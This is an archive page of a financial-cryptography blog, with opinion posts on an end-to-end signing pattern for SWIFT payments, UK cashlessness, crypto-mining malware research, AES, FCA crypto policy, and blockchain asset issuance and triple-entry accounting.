February 09, 2020

Russian Dolls - a design pattern for end to end secure transactions

Tweet thread:

This is a great research attack on a SWIFT-using payment institution (likely a British bank allowing the research to be conducted) from Oliver Simonnet.

But I was struck by how the architectural flaw leapt out and screamed HIT ME HERE! 1/17

@mikko We were able to demonstrate a proof-of-concept for a fraudulent SWIFT payment message to move money. This was done by manually forging a raw SWIFT MT103 message. Research by our Oliver Simonnet: labs.f-secure.com/blog/forging-swift-mt-payment-messages

Here’s the flaw: SAC is a flag that says signature verification and RMA (Relationship Management Application) authorisation and verification was successful.

Let me say that more clearly: SAC says verification is done. 2/17

The flaw is this: the SAC isn’t the authorisation - it’s a flag saying there was an auth. Which means, in short SWIFT messages do not carry any role-based authorisations.

They might be authorised, but it’s like they slapped a sticker on to say that.

Not good enough. 3/17

It’s hard to share just how weird this is. Back in the mid nineties when people were doing this seriously on the net, we invented many patterns to make digital payments secure, but here we are in the ‘20s - and SWIFT and their banks haven’t got the memo. 4/17

They’ve done something: LUAs,MACs,CHKs.

But these are not authorisations over messages, they’re handshakes that carry the unchanged message to the right party. These are network-security mechanisms, not application-level authorisations - they don’t cover rogue injection. 5/17

Let’s talk about a solution. This is the pattern that Gary and I first explored in Ricardo in mid-nineties, and Chris Odom put more flesh on the design and named it:

Russian Dolls

It works like this: 6/17

Every node is an agent. And has a signing key.

The signing key says this message is authorised - not access controlled, not authentically from me but authorised by me and I take the consequences if it goes wrong. 7/17

Every node signs their messages going out at the application level.

(as an aside - to see this working properly, strip out LUAs and encryption, they’re just a distraction. This will work over the open net, over raw channels.) 8/17

Every node receives inbound messages, checks they are authorised, and only proceeds to then process authorised messages. At that point it takes over responsibility - this node is now responsible for the outcomes, but only its processing, bc it has an authorised instruction. 9/17

The present node now wraps the inbound message into its outbound message, and signs the whole message, including the received inbound.

The inbound is its authorisation to process, the outbound is an authorisation to the next node.

Sends, to the next node. 10/17

Repeat. Hence the message grows each time. Like Russian Dolls, it recursively includes each prior step. So, to verify:

take the message you received, check it is authorised.

THEN, pull out its inner message, and verify that.

Repeat all the way to the smallest message. 11/17

This solves the SWIFT design weakness: firstly there is no message injection possible - at the message layer.

You could do this over the open net and it would still be secure (where, secure means nobody can inject messages and cause a bad transaction to happen). 12/17

2- as the signing key is now responsible as a proxy for the role/owner of that node, the security model is much clearer - PROTECT THAT KEY!

3- compromise of any random key isn’t enough bc the attacker can’t forge the inbound.

For top points, integrate back into the customer. 13b/17

OK, if you’ve followed along & actually get the pattern, you’re likely saying “Why go to all that bother? Surely there is a better, more efficient way…”

Well, actually no, it’s an end to end security model. That should be the beginning and end of the discussion. 14/17

But there is more: The Russian Dolls pattern of role-based authorisation (note, this is not RBAC) is an essential step on the road to full triple entry:

"I know that what you see is what I see."

15/17

In triple entry, the final signed/authorised message, the Big Babushka, becomes the 'receipt'. You:

(a) reflect the Babushka back to the sender as the ACK, AND

(b) send it to SWIFT and on to the receiving bank.

Now, the receiving bank sees what client sender sees. 16/17

And you both know it. Muse on just what this does to the reconciliation and lost payments problem - it puts designs like this in sight of having reliable payments.

(But don’t get your hopes up. There are multiple reasons why it’s not coming to SWIFT any time soon.)

17/17

Posted by iang at 04:30 PM | Comments (1)

March 16, 2019

Financial exclusion and systemic vulnerability are the risks of cashlessness

"Access to Cash Review" confirms much that we have been warning of as UK walks into its future financial gridlock. From WolfStreet:

Transition to Cashless Society Could Lead to Financial Exclusion and System Vulnerability, Study Warns

by Don Quijones • Mar 14, 2019

“Serious risks of sleepwalking into a cashless society before we’re ready – not just to individuals, but to society.”

Ten years ago, six out of every ten transactions in the UK were done in cash. Now it’s just three in ten. And in fifteen years’ time, it could be as low as one in ten, reports the final edition of the Access to Cash Review. Commissioned as a response to the rapid decline in cash use in the UK and funded by LINK, the UK’s largest cash network, the review concludes that the UK is not nearly ready to go fully cashless, with an estimated 17% of the population – over 8 million adults – projected to struggle to cope if it did.

Although the amount of cash in circulation in the UK has surged in the last 10 years from £40 billion to £70 billion and British people as a whole continue to value it, with 97% of them still carrying cash on their person and another 85% keeping some cash at home, most current trends — in particular those of a technological and generational bent — are not in physical money’s favor:

Over the last 10 years, cash payments have dropped from 63% of all payments to 34%. UK Finance, the industry association for banks and payment providers, forecasts that cash will fall to 16% of payments by 2027.
...

Curiously, several factors are identified which speak to current politics:


  • "ATMs — or cashpoint machines, as they’re termed locally — are disappearing at a rate of around 300 per month, leaving consumers in rural areas struggling to access cash."

  • "The elderly are widely perceived as the most reliant on cash, but the authors of the report found that poverty, not age, is the biggest determinant of cash dependency."

  • "17% of the UK population – over 8 million adults – would struggle to cope in a cashless society."

  • "Even now, there’s not enough cash in all the right places to keep a cash economy working for long if digital or power connections go down, warns the report."

I have always thought that Brexit was not a vote against Europe but a vote against London. The population of Britain split, somewhere around 2008 crisis into rich London and poor Britain. After the crash, London got a bailout and the poor got poorer.

By 2016-2017 the feeling in the countryside was palpably different to London. Even 100km out, people were angry. Lots of people living without the decent jobs, and no understanding as to why the good times had not come back again after the long dark winter.

Of course the immigrants got blamed. And it was all too easy to believe the silver-toungued lie of Londoners that EU regulation was the villain.

But London is bank territory. That massive bailout kept it afloat, and on to bigger and better things. E.g., a third of all European fintech startups are in London, and that only makes sense because the goal of a fintech is to be sold to ... a bank.

Meanwhile, the banks and the regulators have been running a decade long policy on financial exclusion:

"And it’s not all going in the right direction – tighter security requirements for Know Your Customer (KYC) and Anti-Money Laundering) (AML), for example, actually make digital even harder to use for some.

Note the politically cautious understatement: KYC/AML excludes millions from digital payments. The AML/KYC system as designed gives the banks the leeway to cut out all low end unprofitable accounts by raising barriers to entry and by giving them carte blanche to close at any time. Onboarding costs are made very high by KYC, and 'suspicion' is mandated by AML: there is no downside for the banks if they are suspicious early and often, and serious risk of huge fines if they miss one.

Moving to a cashless, exclusionary society is designed for London's big banks, but risks society in the process. Around the world, the British are the most slavish in implementing this system, and thus denying millions access to bank accounts.

And therefore jobs, trade, finance, society. Growth comes from new business and new bank accounts, not existing ones. Placing the UK banks as the gatekeepers to growth is thus a leading cause of why Britain-outside-London is in a secular depression.

Step by painful step we arrive at Brexit. Which the report wrote about, albeit in roundabout terms:

Government, regulators and the industry must make digital inclusion in payments a priority, ensuring that solutions are designed not just for the 80%, but for 100% of society.

But one does not keep ones job in London by stating a truth disagreeable to the banks or regulators.

Posted by iang at 05:25 PM | Comments (0)

January 11, 2019

Gresham's Law thesis is back - Malware bid to oust honest miners in Monero

7 years after we called the cancer that is criminal activity in Bitcoin-like cryptocurrencies, here comes a report that suggests that 4.3% of Monero mining is siphoned off by criminals.

A First Look at the Crypto-Mining Malware
Ecosystem: A Decade of Unrestricted Wealth

Sergio Pastrana
Universidad Carlos III de Madrid*
spastran@inf.uc3m.es
Guillermo Suarez-Tangil
King’s College London
guillermo.suarez-tangil@kcl.ac.uk

Abstract—Illicit crypto-mining leverages resources stolen from victims to mine cryptocurrencies on behalf of criminals. While recent works have analyzed one side of this threat, i.e.: web-browser cryptojacking, only white papers and commercial reports have partially covered binary-based crypto-mining malware. In this paper, we conduct the largest measurement of crypto-mining malware to date, analyzing approximately 4.4 million malware samples (1 million malicious miners), over a period of twelve years from 2007 to 2018. Our analysis pipeline applies both static and dynamic analysis to extract information from the samples, such as wallet identifiers and mining pools. Together with OSINT data, this information is used to group samples into campaigns.We then analyze publicly-available payments sent to the wallets from mining-pools as a reward for mining, and estimate profits for the different campaigns.Our profit analysis reveals campaigns with multimillion earnings, associating over 4.3% of Monero with illicit mining. We analyze the infrastructure related with the different campaigns,showing that a high proportion of this ecosystem is supported by underground economies such as Pay-Per-Install services. We also uncover novel techniques that allow criminals to run successful campaigns.

This is not the first time we've seen confirmation of the basic thesis in the paper Bitcoin & Gresham's Law - the economic inevitability of Collapse. Anecdotal accounts suggest that in the period of late 2011 and into 2012 there was a lot of criminal mining.

Our thesis was that criminal mining begets more, and eventually pushes out the honest business, of all form from mining to trade.

Testing the model: Mining is owned by Botnets

Let us examine the various points along an axis from honest to stolen mining: 0% botnet mining to 100% saturation. Firstly, at 0% of botnet penetration, the market operates as described above, profitably and honestly. Everyone is happy.

But at 0%, there exists an opportunity for near-free money. Following this opportunity, one operator enters the market by turning his botnet to mining. Let us assume that the operator is a smart and careful crook, and therefore sets his mining limit at some non-damaging minimum value such as 1% of total mining opportunity. At this trivial level of penetration, the botnet operator makes money safely and happily, and the rest of the Bitcoin economy will likely not notice.

However we can also predict with confidence that the market for botnets is competitive. As there is free entry in mining, an effective cartel of botnets is unlikely. Hence, another operator can and will enter the market. If a penetration level of 1% is non-damaging, 2% is only slightly less so, and probably nearly as profitable for the both of them as for one alone.

And, this remains the case for the third botnet, the fourth and more, because entry into the mining business is free, and there is no effective limit on dishonesty. Indeed, botnets are increasingly based on standard off-the-shelf software, so what is available to one operator is likely visible and available to them all.

What stopped it from happening in 2012 and onwards? Consensus is that ASICs killed the botnets. Because serious mining firms moved to using large custom rigs of ASICS, and as these were so much more powerful than any home computer, they effectively knocked the criminal botnets out of the market. Which the new paper acknowledged:

... due to the proliferation of ASIC mining, which uses dedicated hardware, mining Bitcoin with desktop computers is no longer profitable, and thus criminals’ attention has shifted to other cryptocurrencies.

Why is botnet mining back with Monero? Presumably because Monero uses an ASIC-resistant algorithm that is best served by GPUs. And is also a heavy privacy coin, which works nicely for honest people with privacy problems but also works well to hide criminal gains.

Posted by iang at 05:01 PM | Comments (11)

October 19, 2018

AES was worth $250 billion dollars

So says NIST...

10 years ago I annoyed the entire crypto-supply industry:

Hypothesis #1 -- The One True Cipher Suite

In cryptoplumbing, the gravest choices are apparently on the nature of the cipher suite. To include latest fad algo or not? Instead, I offer you a simple solution. Don't.

There is one cipher suite, and it is numbered Number 1.
Cypersuite #1 is always negotiated as Number 1 in the very first message. It is your choice, your ultimate choice, and your destiny. Pick well.

The One True Cipher Suite was born of watching projects and groups wallow in the mire of complexity, as doubt caused teams to add multiple algorithms- a complexity that easily doubled the cost of the protocol with consequent knock-on effects & costs & divorces & breaches & wars.

It - The One True Cipher Suite as an aphorism - was widely ridiculed in crypto and standards circles. Developers and standards groups like the IETF just could not let go of crypto agility, the term that was born to champion the alternate. This sacred cow led the TLS group to field something like 200 standard suites in SSL and radically reduce them to 30 or 40 over time.

Now, NIST has announced that AES as a single standard algorithm is worth $250 billion economic benefit over 20 years of its project lifetime - from 1998 to now.

h/t to Bruce Schneier, who also said:

"I have no idea how to even begin to assess the quality of the study and its conclusions -- it's all in the 150-page report, though -- but I do like the pretty block diagram of AES on the report's cover."

One good suite based on AES allows agility within the protocol to be dropped. Entirely. Instead, upgrade the entire protocol to an entirely new suite, every 7 years. I said, if anyone was asking. No good algorithm lasts less than 7 years.

Crypto-agility was a sacred cow that should have been slaughtered years ago, but maybe it took this report from NIST to lay it down: $250 billion of benefit.

In another footnote, we of the Cryptix team supported the AES project because we knew it was the way forward. Raif built the Java test suite and others in our team wrote and deployed contender algorithms.

Posted by iang at 05:11 PM | Comments (2)

June 25, 2018

FCA on Crypto: Just say no.

Because it's Sunday, I thought I'd write a missive on that favourite depressing topic, the current trend of the British nation to practice economic self-immolation. I speak of course of the FCA's letter to the CEO.

Some many may be bemused and think that this letter shows signs of progress. No such. What the letter literally is, is the publication of a hitherto secret order sent to CEOs of banks to not bank crypto.

The instruction was delivered some time ago. Verbally. And deniably. The banks knew it, the FCA knew it, but all denied it unless under condition of confidentiality or alcohol.

Which put the FCA, the banks, and Britain into considerable difficulties - the FCA could neither move forward to adjust because there was no position to adjust, the British banks could not bank crypto because they were under instruction, and the British crypto-using public either got screwed by the banks or they left the country for Europe and places further afield.

(Oddly, it turns out that Berlin is the major beneficiary here, but that's a salacious distraction.)

After some pressure as the 'star chamber' process of business policy, it transpires a week ago that the FCA has come out of the cold and issued the actual instruction in writing. This is now sufficient to replace the secret instruction, so it represents a movement of sorts. We can now at least openly debate it.

However the message has not changed. To understand this, one has to read the entire letter and also has to know quite a lot about banks, compliance and the fine art of nah-saying while appearing to be encouraging.

The tone is set early on:

CRYPTOASSETS AND FINANCIAL CRIME

As evidence emerges of the scope for cryptoassets1 to be used for criminal purposes, I am writing regarding good practice for how banks handle the financial crime risks posed by these products.

There are many non-criminal motives for using cryptoassets.

It's all about financial crime. The assumption is that crypto is probably used for financial crime, and the banks' job is to stop that happening. Which would logically set a pretty high bar because (like money, which is also used for financial crime) the use of crypto (money) by customers is generally opaque to the bank. But banks are used to being the frontline soldiers in the war on finance, so they will not notice a change here.

The problem is of course that it simply doesn't work. The bank can't see what you are doing with crypto, so what to do? When the banks ask customers what they do with the money, costs sky rocket, but the quality of the information doesn't increase.

There is therefore only one equilibrium in this mathematical puzzle that the FCA has set the banks: Just say no. Shut down any account that uses crypto. Because we will hold you for it and we will insist on no failures.

Now, if it was just that, a dismal letter conflating crime with business, one could argue the toss. But the letter goes on. Here's the smoking gun:

Following a risk-based approach does not mean banks should approach all clients operating in these activities in the same way. Instead, we expect banks to recognise that the risk associated with different business relationships in a single broad category can vary, and to manage those risks appropriately.

The risk-based approach!

Once that comes into play, what the bank reads is that they are technically permitted to use crypto, but they are strictly liable if it goes wrong. Because they've been told to do their risk analysis, and they've done their risk analysis, and therefore the risks are analysed which conflates with reduced to zero.

Which means, they can only touch crypto if they know . This knowledge being full knowledge not that other long-running joke called KYC. Banks must know that the crypto is all and totally bona fide.

But they generally have no such tool over customers, because (a) they are bankers and if they had such a tool (b) they wouldn't be bankers, they would be customers.

(NB., to those who know their history, anglo-world banks used to know their customers' business quite well. But that went the way of the local branch manager and the dodo. It was all replaced by online, national computer networks, and now AIs that do not manifestly know anything other than how to spit out false positives. NB2 - this really only refers to the anglo world being UK, USA, AU, CAN, NZ and the smaller followers. Continental banking and other places follow a different path.)

Back to today. The upshot of the relationship for regulator-bank in the anglo world is this: "risk-based analysis" is code for "if you get it wrong, you're screwed." Which latter part is code for fines and so forth.

So what is the significance of this, other than the British policy of not doing crypto as a business line (something that Berlin, Gibraltar, Malta, Bermuda and others are smiling about)? It's actually much more devastating that one would think.

It's not about just crypto. As a society, we don't care about crypto more than as a toy for rich white boys to play at politics and make money without actually doing anything. Fun for them, soap opera for observers but the hard work is elsewhere.

It's not in the crypto - it's in the compliance. As I wrote elsewhere, banks in the anglo world and their regulators are locked in a deadly embrace of compliance. It has gotten to the point where all banking product is now driven by compliance, and not by customer service, or by opportunity, or by new product.

In that missive on Identity written for R3's member banks, I made a startling claim:

FITS – the Financial Identity Trilemma Syndrome

If you’re suffering from FITS, if might be because of compliance. As discussed at length in the White Paper on Identity, McKinsey has called out costs of compliance as growing at 20% year on year. Meanwhile, the compliance issue has boxed in and dumbed down the security, and reduced the quality of the customer service. This is not just an unpleasantness for customers, it’s a danger sign – if customers desert because of bad service, or banks shed to reduce risk of fines, then banks shrink, and in the current environment of delicate balance sheets, rising compliance costs and a recessionary economy, reduction in bank customer base is a life-threatening issue.

For those who are good with numbers, you'll pretty quickly realise that 20% is great if it is profits or revenues or margin or one of those positive numbers, but it's death if it is cost. And, compliance is *only a cost*. So, death.

Which led us to wonder how long this can go on?

(youtube, transcript) Cost to compliance now is about 30% I’ve heard, but you pick your own number. Who works at a bank? Nobody, okay. That’s probably good news. [laughs] Who’s got a bank account? I’ve got bad news: if you do the compounding, in seven years you won’t have a bank accounts, because all the banks will be out of money. If you compound 30% forward by 20%, in seven years all of the money is consumed on compliance.

As I salaciously said at a recent Mattereum event on Identity, the British banks have 7 years before they die. That's assuming a 30% compliance cost today and 20% year on year increase. You could pick 5% now and 10% by 2020 as Duff & Phelps did which perversely seems more realistic as if the load is now 30% then banks are already dead, we don't need to wait until 100%. Either way, there is gloom and doom however society looks at it.

Now these are stupid numbers and bloody stupid predictions. The regulators are going to kill all the banks? Nah... that can only be believed with compelling evidence.

The FCA letter to the CEO is that compelling evidence. The FCA has doubled down on compliance. They have now, I suspect, achieved their 20% increase in compliance costs for this year, because now the banks must double down and test all accounts against crypto-closure policy. More.

We are one year closer to banking Armageddon - thanks, FCA.

What can we see here? Two things. Firstly, it cannot go on. Even Mark Carney must know that burning the banking village to save it is going to put Britain into the mother of all recessions. So they have to back off sometime, but when will that be? If I had to guess, it will be when major clients in the City of London desert the British banks, because no other message is heard in Whitehall or Threadneedle St. C.f., Brexit. Business itself isn't really listened to, or in the immortal words of the British Foreign Secretary,

Secondly, is it universal? No. There is a glimmer of hope. The major British banks cannot do crypto because the costs are asymmetric. But for a crypto bank that is constructed from ground up, within the FCA's impossible recipe, the costs are manageable. Such a bank would basically impose the crypto-compliance costs over all, so all must be in crypto. An equilibrium available to a specialist bank, not any high street dinosaur.

You might call that a silver lining. I call it a disaster. The regulators are hell bent on destroying the British economy by adding 20% extra compliance burden every year - note that they haven't begun to survey their costs, nor the costs to society.

After the collapse there will be green shoots, and we should cheer? Shoot me now.
Frankly, the broken window fallacy would be better than that process - we should just topple the banks with crypto right now and get the pain over with, because a fast transition is better than the FCA smothering the banks with compliance love.

But, obviously, the mandarins in Whitehall think differently. Watch the next seven years to learn how British people live in interesting times.

Posted by iang at 07:02 AM | Comments (2)

May 05, 2017

4th ed. Electronic Evidence now available

Stephen Mason has released the 4th edition of Electronic Evidence at

Electronic Evidence (4th edition, Institute of Advanced Legal Studies for the SAS Humanities Digital Library, School of Advanced Study, University of London, 2017)

http://ials.sas.ac.uk/digital/humanities-digital-library/observing-law-ials-open-book-service-law/electronic-evidence

Note that this is free to download, and it's a real law book, so we're entering a new world of accessibility to this information. The following are also freely available:

Electronic Signatures in Law (4th edition, Institute of Advanced Legal Studies for the SAS Humanities Digital Library, School of Advanced Study, University of London, 2016)
http://ials.sas.ac.uk/digital/humanities-digital-library/observing-law-ials-open-book-service-law/electronic-signatures

Free journal: Digital Evidence and Electronic Signature Law Review
http://journals.sas.ac.uk/deeslr/
(also available in the LexisNexis and HeinOnline electronic databases)

http://stephenmason.co.uk/

For those of us who spend a lot of time travelling around, free digital downloads is a gift from heaven!

Posted by iang at 02:00 PM | Comments (0)

November 04, 2015

FC wordcloud

Courtesy of statistical analysis over this site by Uyen Ng.

Posted by iang at 02:39 PM | Comments (0)

October 25, 2015

When the security community eats its own...

If you've ever wondered what that Market for Silver Bullets paper was about, here's Pete Herzog with the easy version:

When the Security Community Eats Its Own

BY PETE HERZOG
http://isecom.org

The CEO of a Major Corp. asks the CISO if the new exploit discovered in the wild, Shizzam, could affect their production systems. He said he didn't think so, but just to be sure he said they will analyze all the systems for the vulnerability.

So his staff is told to drop everything, learn all they can about this new exploit and analyze all systems for vulnerabilities. They go through logs, run scans with FOSS tools, and even buy a Shizzam plugin from their vendor for their AV scanner. They find nothing.

A day later the CEO comes and tells him that the news says Shizzam likely is affecting their systems. So the CISO goes back to his staff to have them analyze it all over again. And again they tell him they don’t find anything.

Again the CEO calls him and says he’s seeing now in the news that his company certainly has some kind of cybersecurity problem.

So, now the CISO panics and brings on a whole incident response team from a major security consultancy to go through each and every system with great care. But after hundreds of man hours spent doing the same things they themselves did, they find nothing.

He contacts the CEO and tells him the good news. But the CEO tells him that he just got a call from a journalist looking to confirm that they’ve been hacked. The CISO starts freaking out.

The CISO tells his security guys to prepare for a full security upgrade. He pushes the CIO to authorize an emergency budget to buy more firewalls and secondary intrusion detection systems. The CEO pushes the budget to the board who approves the budget in record time. And almost immediately the equipment starts arriving. The team works through the nights to get it all in place.

The CEO calls the CISO on his mobile – rarely a good sign. He tells the CISO that the NY Times just published that their company allegedly is getting hacked Sony-style.

They point to the newly discovered exploit as the likely cause. They point to blogs discussing the horrors the new exploit could cause, and what it means for the rest of the smaller companies out there who can’t defend themselves with the same financial alacrity as Major Corp.

The CEO tells the CISO that it's time they bring in the FBI. So he needs him to come explain himself and the situation to the board that evening.

The CISO feels sick to his stomach. He goes through the weeks of reports, findings, and security upgrades. Hundreds of thousands spent and - nothing! There's NOTHING to indicate a hack or even a problem from this exploit.

So wondering if he’s misunderstood Shizzam and how it could have caused this, he decides to reach out to the security community. He makes a new Twitter account so people don’t know who he is. He jumps into the trending #MajorCorpFail stream and tweets, "How bad is the Major Corp hack anyway?"

A few seconds later a penetration tester replies, "Nobody knows xactly but it’s really bad b/c vendors and consultants say that Major Corp has been throwing money at it for weeks."

Read on for the more deeper analysis.

Posted by iang at 06:04 AM | Comments (0)

June 12, 2015

Issuance of assets, Genesis of transactions, contracting for swaps - all the same stuff


Here's what Greg Maxwell said about asset issuance in sidechains:

So the idea behind the issued assets functionality in Elements is to explicitly tag all of the tokens on the network with an asset type, and this immediately lets you use an efficient payment verification mechanism like bitcoin has today. And then all of the accounting rules can be grouped by asset type. Normally in bitcoin your transaction has to ensure that the sum of the coins that comes in is equal to the sum that come out to prevent inflation. With issued assets, the same is true for the separate assets, such that the sum of the cars that come in is the same as the sum of the cars that come out of the transaction or whatever the asset is. So to issue an asset on the system, you use a new special transaction type, the asset issuance transaction, and the transaction ID from that issuance transaction becomes the tag that traces them around. So this is early work, just the basic infrastructure for it, but there's a lot of neat things to do on top of this. *This is mostly the work of Jorge Tímon*.

Jorge documented all this back in 2013 in FreiMarkets with Mark Friedenbach. Basically he's adding issuance to the blockchain, which I also covered in principle back in that talk in January at PoW's Tools for the Future. As he covers issuance above, here's what I said about another aspect, being the creation of a new blockchain:

Where is this all going? We need to make some changes. We can look at the blockchain and make a few changes. It sort of works out that if we take the bottom layer, we've got a bunch of parameters from the blockchain, these are hard coded, but they exist. They are in the blockchain software, hard coded into the source code.

So we need to get those parameters out into some form of description if we're going to have hundreds, thousands or millions of block chains. It's probably a good idea to stick a smart contract in there, who's purpose is to start off the blockchain, just for that purposes. And having talked about the legal context, when going into the corporate scenario, we probably need the legal contract -- we're talking text, legal terms and blah blah -- in there and locked in.

We also need an instantiation, we need an event to make it happen, and that is the genesis transaction. Somehow all of these need to be brought together, locked into the genesis transaction, and out the top pops an identifier. That identifier can then be used by the software in various and many ways. Such as getting the particular properties out to deal with that technology, and moving value from one chain to another.

This is a particular picture which is a slight variation that is going on with the current blockchain technology, but it can lead in to the rest of the devices we've talked about.

The title of the talk is "The Sum of all Chains - Let's converge" for a reason. I'm seeing the same thinking in variations go across a bunch of different projects all arriving at the same conclusions.

It's all the same stuff.

Here's today's "legathon" at UBS, at which the banking chaps tried to figure out how to handle a swap of GBP and Canadian Dollars that goes sour - because of a bug, or a lapse in understanding, or a hack, who knows? The two traders end up in court trying to resolve their difference in views.

In the court, the judge asks for the evidence -- where is the contract? So it was discovered that the two traders had entered into a legal contract that was composed of the prose document (top black box) and the smart contract thingie (lower black box). Then some events had happened, but somehow we hadn't got to the end. At this point there is a deep dive into the tech and the prose and the philosophy, law, religion and anything else people can drag in.

However, there's a shortcut. On that prose on the whiteboard, the lawyer chap who's name escapes me wrote 3 clauses. Clause (1) said:

(1) longest chain is correct chain

See where this is going? The judge now asks which is the longest chain. One side looks happy, the other looks glum.

Let's converge; on the longest chain, *if that's what you wrote down*.

Posted by iang at 05:34 AM | Comments (0)

June 05, 2015

Coase's Blockchain - the first half block - Vinay Gupta explains triple entry

Editor's Preamble! Back in 1997 I gave a paper on crowdfunding - I believe the first ever proper paper, although there was one "lost talk" earlier by Eric Hughes - at Financial Cryptography 1997. Now, this conference was the first polymath event in the space, and probably the only one in the space, but that story is another day. Because this was a polymath event, law professor who's name escapes Michael Froomkin stood up and asked why I hadn't analysed the crowdfunding system from the point of view of transaction economics.

I blathered - because I'd not heard of it! But I took the cue, went home and read the Ronald Coase paper, and some of his other stuff, and ploughed through the immensely sticky earth of Williamson. Who later joined Coase as a Nobel Laureate.

The prof was right, and I and a few others then turned transaction cost discussion into a cypherpunk topic. Of course, we were one or two decades too early, and hence it all died.

Now, with gusto, Vinay Gupta has revived it all as an explanation of why the blockchain works. Indeed, it's as elegant a description of 'why triple entry' as I've ever heard! So here goes my Saturday writing out Coase's first half block, or the first 5 minutes of Gupta's talk.



This is the title of the talk - Coase's Blockchain. Does anyone in the audience know who Ronald Coase was? No? Ok. He got the Nobel Prize for Economics in 1940. Coase's question was, why does the company exist as an institution? Theoretically, if markets are more efficient than command economies, because of a better distribution of information, why do we then recreate little pockets of command economy in the form of a thing you call a company?

And, understanding why the company exists is a critical thing if you want to start companies or operate companies because the question you have to ask is why are we doing this rather than having a market of individual actors. And Coase says, the reason that we don't have seas of contractors, we've got structures like say IBM, is because making good decisions is expensive.

Last time you bought a telephone or a television or a car you probably spent 2 days on the Internet looking at reviews trying to make a decision, right? Familiar experience? All of that is a cost, that in a company is made by purchasing. Same thing for deciding strategy, if you're a small business person you spend a ton of time worrying about strategy, and all of those costs in a large company are amortised across the whole company. The company serves to make decisions and then amortise the costs of the decisions across the entire structure.

This is all essentially about transaction costs. Now, move onto Venture Capital.

Paul Graham's famous essay "Black Swan Farming." What they basically say is venture capitalists have no idea what will or won't work, we can't tell. We are in the business of guessing winners, but it turns out that our ability to successfully predict is less than one in a hundred. Of a hundred companies we fund, 90 will fail, 10 will make about 10 times what we put into them, and one in about a thousand will make us a ton of money. One thousand to one returns are higher, but we actually have no way of telling which is which, so we just fund everything.

Even with their very large sample size, they are unable to successfully predict what will or will not succeed. And if this is true for venture capitalists, how much truer is it for entrepreneurs? As a venture capitalist, you have an N of maybe 600 or 1000, as an entrepreneur you've got an N of 2 or 3. All entrepreneurs are basically guessing that their thing might work with totally inadequate evidence and no legitimate right to assume their guess is any good because if the VCs can't tell, how the heck is the entrepreneur supposed to tell?

We're in an environment with extremely scarce information about what will or will not succeed and even the people with the best information in the world are still just guessing. The whole thing is just guesswork.

History of Blockchains in a Nutshell, and I will bring all this back together in time.

In the 1970s the SQL database was basically a software system that was designed to make it possible to do computation using tape storage. You know how in databases, you have these fixed field lengths, 80 characters 40 characters, all this stuff, it was so that when you fast-forwarded the tape, you knew that each field would take 31 inches and you could fast forward by 41 and a half feet to get to the record you needed next. The entire thing was about tape.

In the 1990s, we invent the computer network, at this point we're running everything across telephone wires, basically this is all pre-Ethernet. It's really really early stuff and then you get Ethernet and standardisation and DNS and the web, the second generation of technology.

The bridges between these systems never worked. Anybody that's tried to connect two corporations across a database knows that it's just an absolute nightmare. You get hacks like XML-EDI or JSON or SOAP or anything like that but you always discover that the two databases have different models of reality and when you interconnect them together in the middle you wind up having to write a third piece of software.

The N-squared problem. So the other problem is that if we've got 50 companies that want to talk to 50 companies you wind up having to write 50-squared interconnectors which results in an unaffordable economic cost of connecting all of these systems together. So you wind up with a hub and spoke architecture where one company acts as the broker, everybody writes a connector to that company, and then that company sells all of you down the river because it has absolute power.

As a result, computers have had very little impact on the structure of business even though they've brought the cost of communication and the cost of knowledge acquisition down to a nickel.

This is where we get back to Coase. The revolution that Coase predicted that computers should bring to business hasn't yet happened, and my thesis is that blockchains is what it takes to get that to run.


Editor again: That was Vinay's first 5m after which he took it across to blockchains. Meanwhile, I'll fork back a little to triple entry.

Recall the triple entry concept as being an extension of double entry: The 700 year old invention of double entry used two recordings as a redundant check to eliminate errors and surface fraud. This allowed the processing of accounting to be so reliable that employed accountants could do it. But accounting's double entries were never accepted outside the company, because as Gupta puts it, companies had "different models of reality."

Triple entry flips it all upside down by having one record come from an independent center, and then that record is distributed back to the two companies of any trade, making for 3 copies. Because we used digital signatures to fix one record, triply recorded, triple entry collapses the double vision of classical accounting's worldview into one reality.

We built triple entry in the 1990s, and ran it successfully, but it may have been an innovationary bridge too far. It may well be that what we were lacking was that critical piece: to overcome the trust factor we needed the blockchain.

On that note, here's another minute of the talk I copied before I realised my task was done!


The blockchain, regardless of all the complicated stuff you've heard about it, is simply a database that works just like the network. A computer network is everywhere and nowhere, nobody really owns it, and everybody cooperates to make it work, all of the nodes participate in the process, and they make the entire thing efficient.

Blockchains are simply databases updated to work on the network. And those databases are ones with different properties than the databases made to run on tape. They're decentralised, you can't edit anything, you can't delete anything, the history is stored perfectly, if you want to make an update you just republish a new version of it, and to ensure the thing has appropriate accountability you use digital signatures.

It's not nearly as complicated as the tech guys in blockchainland will tell you. Yes it's as complicated as the inside of an SQL database. All of your companies run SQL databases, none of you really know how they work, it's going to be just like that with blockchains. Two years you'll forget the word blockchain, you'll just hear database, and it'll mean the same thing. Probably.

Posted by iang at 08:07 AM | Comments (0)

February 03, 2015

News that's news: Kenya's M-Kopa Solar Closes $12.45m

If there's any news worth blogging about, it is this:

Breaking: Kenya's M-Kopa Solar Closes $12.45 million Fourth Funding Round

M-KOPA Solar has today closed its fourth round of investment through a $12.45 million equity and debt deal, led by LGT Venture Philanthropy. The investment will be used to expand the company's product range, grow its operating base in East Africa and license its technology to other markets.

Lead investor LGT Venture Philanthropy has backed M-KOPA since 2011 and is making its biggest investment yet in the fourth round, which also includes reinvestments from Lundin Foundation and Treehouse Investments (advised by Imprint Capital)and a new investment from Blue Haven Initiative.

In less than two and a half years since launch, M-KOPA Solar has installed over 150,000 residential solar systems in Kenya, Uganda and Tanzania, and is now connecting over 500 new homes each day. The company plans to further expand its distribution and introduce new products to reach an even larger customer base.

Jesse Moore, Managing Director and Co-Founder M-KOPA Solar says, "Our investors see innovation and scale in what M-KOPA does. And we see a massive unmet market opportunity to provide millions of off-gridhouseholds with affordable, renewable energy. We are just getting started in terms of the scale and impact of what we will achieve.

Oliver Karius, Partner, LGT Venture Philanthropy says, "We believe that we are at the dawn of a multi-billion dollar 'pay-as-you-go' energy industry. LGT Venture Philanthropy is a long-term investor in M-KOPA Solar because they've proven to be the market leaders,both in terms of innovating and delivering scale. We have also seen first-hand what positive impacts their products have on customers lives - making low-income households wealthier and healthier."

This deal follows the successful $20 million (KES1.8 billion) third round funding closed in December 2013 - which featured a working capital debt facility, led by the Commercial Bank of Africa.

